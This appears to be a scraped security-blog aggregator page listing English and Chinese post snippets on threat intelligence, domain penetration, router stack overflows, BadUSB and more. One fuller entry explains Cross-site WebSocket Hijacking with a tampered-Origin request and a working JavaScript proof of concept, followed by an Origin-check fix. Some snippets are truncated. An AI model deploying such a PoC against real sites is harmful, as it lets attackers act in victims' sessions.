Aggregator
Introducing Guardicore Cyber Threat Intelligence
5 years 7 months ago
Introducing Cyber Threat Intelligence (CTI), a freely available resource to assist in identifying and investigating malicious IP addresses and domains.
Daniel Goldberg & Ravit Greitser
从一道 CTF 题了解密码学中的 Meet-in-the-middle 攻击
5 years 7 months ago
本文首发于先知
在家里无聊打了 nullcon, 其中有一题用到了 Meet-in-the-middle 这种攻击方式,
在这里分享给大家.
Application Protection Report 2019, Episode 1: PHP Reconnaissance
5 years 7 months ago
Analysis of sensor data from 2018 revealed a big focus on PHP generally, and specifically a large, unsophisticated reconnaissance campaign looking for unsecured databases with PHP front ends.
Guardicore Threat Intelligence Helps Cybersecurity Community Research Attacks and Mitigate Risks
5 years 7 months ago
This post discusses how Guardicore Labs helps Guardicore customers and the security community enhance their security posture.
Akamai
CVE-2019-6446 浅析
5 years 7 months ago
numpy 反序列化 CVE-2019-6446 浅析
Introducing Ability Purge Cache Tag
5 years 7 months ago
The new purge by cache tag functionality in Akamai?s Fast Purge is now available to all Akamai content delivery product customers. To get to this point, we went through an exciting, year-long beta with more than 200 participants purging ~200,000,000 tags. During this time, we noted some fascinating (and surprising) ways that customers leveraged tags in their caching strategy -- we?ll share our six favorite here.
Sid Phadkar
域渗透基础(二) - 淚笑
5 years 7 months ago
(该文参考整理自网上文章,相关链接附于文末) 远程命令执行 PSEXEC psexec是pstools工具包中的一个工具,可在微软官网直接下载。是轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的
淚笑
域渗透基础(一) - 淚笑
5 years 7 months ago
(该文参考整理自网上文章,相关链接附于文末) 域 工作组(Work Group) 工作组是局域网中的一个概念,由许多在同一物理地点,而且被相同的局域网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按
淚笑
KVM async page fault
5 years 7 months ago
Terenceli
路由器漏洞挖掘之栈溢出 - 反弹shell的payload构造 - H4lo
5 years 7 months ago
前言 前一篇讲到了 链的构造,最后直接使用调用 函数的 就可以直接 ,但是实际路由器溢出的情况下都不会那么简单。 这里再看一道 的题,这道题是 下的 。 漏洞分析 直接查看源码: include include include include include include // Pwnable S
H4lo
域环境搭建 - 淚笑
5 years 7 months ago
环境 VMware虚拟机:Windows 2012 R2,Windows 7 一、设置静态ip 这步确实只需要对域控设置静态ip,但我选择设置所有主机为静态ip以固定网络环境。 Windows 2012 R2 172.16.151.200 Windows 7 172.16.151.201 启动虚拟机
淚笑
190321 逆向-花指令去除(脚本)
5 years 7 months ago
Pizza的脚本中是通过get_bytes和patch_bytes两个API来将所有机器码读出然后再Patch回去的
中间匹配pattern的过程是构造字符串然后find来控制
这样操作的优点是find的效率奇高,对于大量数据的处理非常的快
而我们之前使用的逐字符匹配pattern的优点是可控性比较强,例如通配符的存在
然而缺点就是速度很慢,对于数量级较大时格外明显,因此试图修复
刚开始以为速度...
whklhhhh
5 Docker Security Best Practices to Avoid Breaches
5 years 7 months ago
Like with any technology, Docker too has its security concerns. Learn the Docker security best practices that will help keep your infrastructure and applications secure.
Igor Livshitz
Why Attacks on Cryptocurrency Exchanges Show No Signs of Slowing Down
5 years 7 months ago
F5 Labs' Ray Pompon writes for Finance Derivative, discussing why hackers will continue targeting cryptocurrency exchanges.
4 Areas Where Infosec Facts and Fiction Clash: Mind the Gap Pt. 1
5 years 7 months ago
There's often a gap between what we say we need for an effective security posture, and what we actually do. Examining the gaps between "best practices" and reality helps us get to more tangible results.
浅谈WebSocket跨域劫持漏洞(CSWSH)
5 years 7 months ago
WebSocket 跨域劫持漏洞
WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。
了解WebSocket Websocket 优点- 支持双向通信,实时性更强。
- 更好的二进制支持。
- 较少的控制开销。连接创建后,ws客户端、服务端进行数据交换时,协议控制的数据包头部较小。在不包含头部的情况下,服务端到客户端的包头只有2~10字节(取决于数据包长度),客户端到服务端的话,需要加上额外4字节的掩码。而HTTP协议每次通信都需要携带完整的头部。
- 支持扩展。ws协议定义了扩展,用户可以扩展协议,或者实现自定义的子协议。(比如支持自定义压缩算法等)
画了一张图让你了解:
漏洞产生建立Websocket连接无验证。
案例1.如下请求:
GET / HTTP/1.1 Host: localhost:8080 Origin: http://127.0.0.1:3000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Version: 13 Sec-WebSocket-Key: w4v7O6xFTi36lq3RNcgctw==篡改Origin,发现没有对Origin进行验证,也可以跨域进行协议升级。
2.进一步验证
2.1获取到了一个发送评论的请求 (使用BurpSuite->Proxy模块->Websockets History查看,这里是对应的 Direction值为Outgoing为发出的请求,Incoming为发出请求对应的响应信息)
2.2使用JavaScript创建Websocket请求
如上图所示Outgoing的内容为“我是帅key的可爱小迷弟”,那么发送的数据就是这个。
<meta charset="utf-8"> <script> function ws_attack(){ var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss:// ws.onopen = function(evt) { ws.send("我是帅key的可爱小迷弟!"); }; ws.onmessage = function(evt) { ws.close(); }; } ws_attack(); </script>2.3验证发现可以请求并成功进行重放,存在Websocket跨域劫持
(这里只是简单的评论请求,危害就是:点我链接让你评论我想评论的,试想:如果是修改密码的WebSocket请求存在劫持那么问题就大了~)
漏洞利用攻击流程跟以往的交互类漏洞没什么区别(点我链接读取你XXX、点我链接让你XXX):
来一个圈子”铸剑实战靶场”的截图,自我体会:
PoC代码编写 <meta charset="utf-8"> <script> function ws_attack(){//自定义函数ws_attack //定义函数功能 //创建WebSocket并赋值给ws变量 var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss:// ws.onopen = function(evt) { //当ws(WebSocket)处于连接状态时执行 ws.send("我是帅key的可爱小迷弟!"); }; ws.onmessage = function(evt) { //当ws(WebSocket)请求有响应信息时执行 //注意:响应的信息可以通过evt.data获取!例如:alert(evt.data); ws.close(); }; } ws_attack();//执行ws_attact函数 </script> 修复方法综合建议:校验Origin头
Referencehttps://www.cnblogs.com/chyingp/p/websocket-deep-in.html
使用badusb“烧鹅”制作“百度U盘” - Vicen
5 years 7 months ago
HID攻击:USB HID攻击技术是一种利用USB接口伪造用户击键行为实施是攻击的方式。通过恶意USB HID设备连接主机后发送伪造的按键命令,篡改系统设置、运行恶意功能。这种技术区别于传统的USB攻击技术,它将恶意代码隐藏在USB设备固件中,设备成为了攻击的主体。一般来讲针对HID的攻击主要集中在
Vicen
巡风源码阅读与分析---Aider.py - Zhengjim
5 years 7 months ago
之前写过一遍Aider.py,但只是跟着代码一顿阅读没有灵魂,所以重新对它阅读并重新写一遍。 描述 文件位置: 是用来辅助验证的脚本 官方描述就一句话 代码阅读分析 这个脚本会监听8088端口、以及DNS监听53端口。可以将所有请求的dns请求记录下来辅助验证某处是否存在漏洞。 源代码: UDP建立
Zhengjim
GCSB statement on the Christchurch terrorist attacks
5 years 7 months ago